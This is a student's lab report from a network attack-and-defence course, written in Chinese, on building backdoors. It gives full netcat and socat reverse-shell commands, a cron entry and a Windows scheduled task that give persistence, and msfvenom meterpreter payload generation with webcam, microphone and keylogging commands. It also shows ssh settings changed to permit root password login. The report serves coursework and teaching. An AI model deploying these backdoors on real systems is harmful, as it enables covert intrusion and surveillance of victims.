2018-2019-2 20165312《网络攻防技术》Exp2 后门原理与实践
2018-2019-2 20165312《网络攻防技术》Exp2 后门原理与实践
课上知识点梳理总结
1.后门的概述
- 后门是指不经过正常认证流程而访问系统的通道
- 两个关键词:未认证、隐通道
- 后门执行的过程:后门程序(.exe)->投送到系统中->启动->隐藏
2.NC或netcat
- 进行基本的TCP、UDP数据收发
- linux下自带ncat,
man ncat
可以查看用法 - windows下需要下载ncat,且执行操作时需要在ncat路径下
- windows(攻击者)获取linux(被攻击者)的shell
- windows(攻击者)打开监听:
ncat.exe -l -p port.linux
其中-l 表示listen -p表示port
- linux(被攻击者)反弹连接:
nc ip.windows port.linux -e /bin/sh
其中-e
表示执行程序
- windows(攻击者)打开监听:
- linux(攻击者)获取windows(被攻击者)的shell
- linux(攻击者)打开监听:
nc -l -p port.windows
- windows(被攻击者)反弹连接:
ncat.exe ip.linux port.windows -e cmd.exe
- linux(攻击者)打开监听:
- nc传输文件
- windows向linux发送文件
- linux下打开监听端口,并把收到的数据保存到
fileout.txt
中:nc -l port > fileout.txt
- windows反弹连接linux的端口:
nc ip.linux port < filein.txt
- 相当于将文件
filein.txt
的内容传送给fileout.txt
- linux下打开监听端口,并把收到的数据保存到
- linux向windows发送文件
- windows下打开监听端口,并把收到的数据保存到filein.txt
中:ncat.exe -l port > filein.txt
- linux反弹连接windows的端口:nc ip.windows port < fileout.txt
- 相当于将文件fileout.txt
的内容传送给filein.txt
- windows向linux发送文件
- nc传输数据
- windows:
ncat.exe -l -p port
- linux:
nc port ip.windows
- 建立连接后,即可进行数据传输
- windows:
3.socat
- socat是netcat的加强版,功能比netcat强大
- 安装
- linux:
sudo apt-get install socat
- windows:需要下载socat,且执行操作时需要在socat路径下
- linux:
- 基本语法:
socat [options] <address> <address>
address
常用的几个描述-,STDIN,STDOUT
表示标准输入输出,可以就用一个横杠代替/var/log/syslog
也可以是其他任意路径,如果是相对路径要使用./,打开一个文件作为数据流TCP:
建立一个TCP连接作为数据流,TCP也可以替换为UDPTCP-LISTEN:
建立TCP监听端口,TCP也可以替换为UDPEXEC:
执行一个程序作为数据流
- socat当cat
- 直接回显:
socat - -
- cat文件:
socat - 文件路径
- 写文件:
echo "hello" | socat - 文件路径
- 直接回显:
- socat当netcat
- 连接远程端口:
socat - TCP:ip:port
- 监听端口:
socat TCP-LISTEN:port -
- 正向shell:
socat TCP-LISTEN:port EXEC:/bin/bash
- 反弹shell:
socat tcp-connect:ip:port exec:'bash -li',pty,stderr,setsid,sigint,sane
- 连接远程端口:
- 更多用法可详见:博客1、博客2
4.Meterpreter
- 将生成的shellcode存入指定的文件中:
msfvenom -p windows/meterpreter/reverse_tcp host = ip.攻击方 port = port -f exe > 1.exe
Exp2.1使用netcat获取主机操作Shell,cron启动
有关cron
- linux下的一个定时执行工具,在不需要人工干涉的情况下执行
- cron服务提供crontab命令来设定cron服务,一些参数说明(参考链接)
-u
设定某个用户的cron服务,一般root用户需要此参数-l
列出某个用户cron服务的详细内容-r
删除某个用户的cron服务-e
编辑某个用户的cron服务
- 有关于cron表达式的含义讲解参考:博客1、博客2
实验思路:既然cron为linux下定时执行工具,那就设定windows获取linux的shell,并通过设置让linux在指定的时间自启动
实验步骤:
windows下获取ip地址:
ipconfig
- windows下监听端口:
ncat.exe -l -p 5312
- linux下编辑cron服务:
crontab -e
并选择3进入编辑器 在最后一行加入:
10 * * * * /bin/netcat 10.0.0.151 5312 -e /bin/sh
意思为在每个小时的第10分钟都能成功反向连接
在17:10,在window下成功查看linux下文件
Exp2.2使用socat获取主机操作Shell, 任务计划启动
实验思路:有关socat,在课上知识点总结中已经陈述。在Exp2.1中使用cron实现了linux下的计划启动,此实验为linux获取windows的shell,即实现windows下的计划启动。
实验步骤
windows标志
->右键
->计算机管理
->任务计划程序
->创建任务
常规
->名称
触发器
->新建
,然后按照图示设置
操作
->新建
,在程序或脚本
中写入socat下载路径,在添加参数
中写入tcp-listen:5312 exec:cmd.exe,pty,stderr
实现反向shell
windows+L
锁定系统后,重新进入即可查看到exp2.2-20165312
已经运行
linux下连接远程端口:
socat - tcp:10.0.0.151:5312
Exp2.3使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
实验思路:结合课上所学nc传输文件以及meterpreter相关的知识即可进行实验,此实验实现从linux->windows。
实验步骤
获取linux的ip:
ifconfig
在linux下生成.exe文件:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.219.133 LPORT=5312 -f exe > 20165312_backdoor.exe
注意这里的ip为攻击方(linux)的地址
- windows下打开监听端口:
ncat.exe -l -p 5312 > 20165312_backdoor.exe
- linux反弹连接windows的端口:
nc 10.0.0.151 5312 < 20165312_backdoor.exe
在windows中查看到传输的文件
在linux中另外打开一个终端,
msfconsole
进入msf控制台
- 使用监听模块:
use exploit/multi/handler
- 设置payload:
set payload windows/meterpreter/reverse_tcp
- 指定ip:
set LHOST 192.168.219.133
与生成后门程序的ip相同 - 指定port:
set LPORT 5312
与生成后门程序的port相同 显示信息:
show options
- 执行监听:
exploit
在windows下执行后门程序:
20165312_backdoor.exe
或者直接双击执行
此时linux已经获得了Windows主机的连接,并且得到了远程控制的shell
Exp2.4使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
实验思路:此实验是在Exp2.3基础上实现msf提权
实验步骤
- 按照Exp2.3的操作,进行到
exploit
截取音频:
record_mic
获取摄像头拍照:
webcam_snap
截屏:
screenshot
记录击键的过程:
keyscan_start
读取击键的记录:keyscan_dump
查看当前用户:
getuid
提取权限:getsystem
提取权限的操作我遇到了bug,依旧在解决ing...(会在遇到的问题里面提到)
实验过程中遇到的问题及解决方法
1.nc传送文件时,由windows传送给linux时,出现“由于目标计算机积极拒绝,无法连接”的错误
通过在群里和同学讨论,猜测这一问题和ssh
有关。在此感谢王高源、李天龙同学。
解决方案:
- 首先查看linux下有没有开启ssh服务:
netstat -tlnp
- 若回显
Active Internet connections (only servers)
没有开启ssh服务
- 若回显
- 编辑
sshd_config
文件,允许远程登入:nano /etc/ssh/sshd_config
- 将
#PasswordAuthentication yes
修改为PasswordAuthentication yes
- 将
#PermitRootLogin yes
修改为PermitRootLogin yes?
ctrl+X
保存并退出
- 将
- 将
SSHD
服务设置为开机自启动:update-rc.d ssh enable
- 重启kail后再尝试就ok了
参考博客链接
2.Exp2.3中,msfconsole
进入msf控制台时出现以下问题
由出错的英文分析得知虚拟机的内存不够,所以就增加内存即可(设置里面可以找到!)
3.Exp2.4中,getsystem
提取权限时,出现以下问题
找了好久,找到了一个解决方法:http://www.mmcaijing.com/31330.html。这个是绕过 UAC 限制的操作,但是我在操作过程中遇到了新的问题,so...这个还没成功。
实验小结
实验感想
整体来说,这次实验不是太难。在我看来核心的内容是nc传输文件、使用MSF生成shellcode和实现msf提权。但我在做实验的过程中遇到了不少的问题,其中不乏有非技术性输错指令,这就很费时间。我会反思减少这种错误。除此之外,也遇到了一些找了很多资料才解决的问题,通过这个过程,也让我锻炼了英语。。所以这次实验不仅让我更加了解后门,也让我在以后做实验的时候再认真一点,减少幼稚错误。
例举你能想到的一个后门进入到你系统中的可能方式
电脑下载的软件里面,毕竟每一个软件里面都有后门
例举你知道的后门如何启动起来(win及linux)的方式
linux:cron定时启动
windows:修改注册表项
Meterpreter有哪些给你印象深刻的功能
生成shellcode,可以获取被控机的音频文件、开启摄像头和录像功能,捕获画面。(之前关闭摄像头了,但是觉得还是害怕.jpg)
如何发现自己有系统有没有被安装后门
打开任务管理器,查看当前运行进程
查看注册表是否被修改过
防火墙
杀毒软件
2018-2019-2 20165312《网络攻防技术》Exp2 后门原理与实践的更多相关文章
- 20155308 《网络攻防》 Exp2 后门原理与实践
20155308 <网络攻防> Exp2 后门原理与实践 学习内容:使用nc实现win,mac,Linux间的后门连接 :meterpraeter的应用 :MSF POST 模块的应用 学 ...
- 20155318 《网络攻防》Exp2 后门原理与实践
20155318 <网络攻防>Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 下载软件前要勾选一些用户协议,其中部分就存在后门进入系统的安全隐患. ...
- 20155321 《网络攻防》 Exp2 后门原理与实践
20155321 <网络攻防> Exp2 后门原理与实践 实验内容 例举你能想到的一个后门进入到你系统中的可能方式? 我觉得人们在平时上网的时候可能会无意识地点击到一些恶意的网站,这些网站 ...
- 20155336 虎光元《网络攻防》Exp2后门原理与实践
20155336 虎光元<网络攻防>Exp2后门原理与实践 一.实验内容 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shel ...
- 20155306 白皎 《网络攻防》 Exp2 后门原理与实践
20155306 白皎 <网络攻防> Exp2 后门原理与实践 一.实践基础 后门程序又称特洛伊木马,其用途在于潜伏在电脑中,从事搜集信息或便于黑客进入的动作.后程序和电脑病毒最大的差别, ...
- 2019-2020-2 20175226 王鹏雲 网络对抗技术 Exp2 后门原理与实践
2019-2020-2 20175226 王鹏雲 网络对抗技术 Exp2 后门原理与实践 实验内容 使用netcat获取主机操作Shell,cron启动: 使用socat获取主机操作Shell, 任务 ...
- 20145309 李昊 《网络攻防》 Exp2 后门原理与实践
实践内容: (1)理解免杀技术原理(1分) (2)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧:(2分) (3)通过组合应用各种技术实现恶意代码免杀( ...
- 20155326刘美岑 《网络对抗》Exp2 后门原理与实践
20155326刘美岑 <网络对抗>Exp2 后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启 ...
- 20155208徐子涵《网络对抗》Exp2 后门原理与实践
20155208徐子涵<网络对抗>Exp2 后门原理与实践 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 答:当我们在非官方网站上下载软件时,后门极有可能会进入我们 ...
- 20155320《网络对抗》Exp2 后门原理与实践
20155320<网络对抗>Exp2 后门原理与实践 [实验内容] (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, ...
随机推荐
- linux 安装 ftp 实现文件共享
转载:http://blog.sina.com.cn/s/blog_165e646820102xe1q.html 参考:1.http://www.cnblogs.com/mrcln/p/6179673 ...
- python爬虫,使用BeautifulSoup解析爬出来的HTML代码时报错
UserWarning: No parser was explicitly specified, so I'm using the best available HTML parser for thi ...
- 小程序使用animation实现跑马灯
html: <view class="marquee"> <view class="content"> <text>{{te ...
- Python:从入门到实践--第七章--用户输入和while循环-练习
#1.编写一个程序,询问用户要租赁什么样的汽车,并打印. car = input("What's kind of cars dou you want to rent?,sir:") ...
- 1(2)IO流---字节流
一.分类 字节流(不适用于文本) InputStream OutputStream 字符流 Reader Writer 二.字节流 1.概述 InputStream 字节输入流,是被读的,抽 ...
- 14JDBC
一.JDBC简介 全名:java database connection java代码与数据库相连的工具,java>JDBC>(oracle mysql sql server) 二.四大 ...
- Spring事务<tx:annotation-driven/>的理解(Controller使用@Transactional)
在使用Spring的时候,配置文件中我们经常看到 annotation-driven 这样的注解,其含义就是支持注解,一般根据前缀 tx.mvc 等也能很直白的理解出来分别的作用. <tx:an ...
- sku
以淘宝为例,sku是具体到某一个商家具体规格商品,比如某商家红色64g的iPhone6,sku对应有对应的价格和库存.而SPU就是我们在输入框里输入的iPhone6,它是多个商家的集合.淘宝的“宝贝” ...
- 解决: Homestead 环境下, yarn install --no-bin-links, NPM run dev, 命令报错
执行以下命令: 1 $ rm -rf node_modules 2 $ yarn config set registry http://registry.cnpmjs.org 3 $ yarn ins ...
- Python之jieba库的使用
jieba库,它是Python中一个重要的第三方中文分词函数库. 1.jieba的下载 由于jieba是一个第三方函数库,所以需要另外下载.电脑搜索“cmd”打开“命令提示符”,然后输入“pip in ...